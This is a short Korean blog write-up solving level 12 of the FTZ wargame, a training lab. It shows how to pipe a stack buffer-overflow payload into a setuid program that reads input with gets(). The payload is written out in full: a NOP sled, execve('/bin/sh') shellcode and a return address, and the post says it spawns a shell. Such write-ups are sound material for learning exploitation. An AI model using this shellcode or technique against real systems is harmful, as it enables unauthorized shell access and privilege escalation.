반응형
FTZ 12 Level
ID : level12
Passwd : it is like this
접속해서 ls 명령어로 파일과 디렉터리를 확인합니다.
cat 명령어로 hint를 열어보면 level11과는 달리 level12에서는 문자열을 gets 함수로 받고 있습니다. main 함수의 인자로 받을 때와 다르게 gets는 코드가 어느정도 실행 된 후에 입력을 받기 때문에 다른 방식으로 넘겨줘야 합니다.
level11 : ./attackme argv[1] 였다면
level12 : (python –c ‘print “문자열”’; cat) | ./attackme
이렇게 | (파이프)를 써서 전달하게 됩니다.
메모리 구조는 level11과 동일합니다. 같은 payload를 사용하겠습니다.
level11 Write Up : http://jaemin8852.tistory.com/27
payload : (python –c ‘print “\x90”*227 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80” + “\xa0\xf3\xff\xbf"’; cat) | ./attackme
이렇게 쉘이 실행됩니다.
감사합니다.
반응형
'System&Write up > FTZ' 카테고리의 다른 글
FTZ level16 -> level17 Write up (0) | 2017.09.25 |
---|---|
FTZ level15 -> level16 Write up (0) | 2017.09.25 |
FTZ level14 -> level15 Write up (0) | 2017.09.25 |
FTZ level13 -> level14 Write up (0) | 2017.09.25 |
FTZ level11 -> level12 Write up (0) | 2017.09.24 |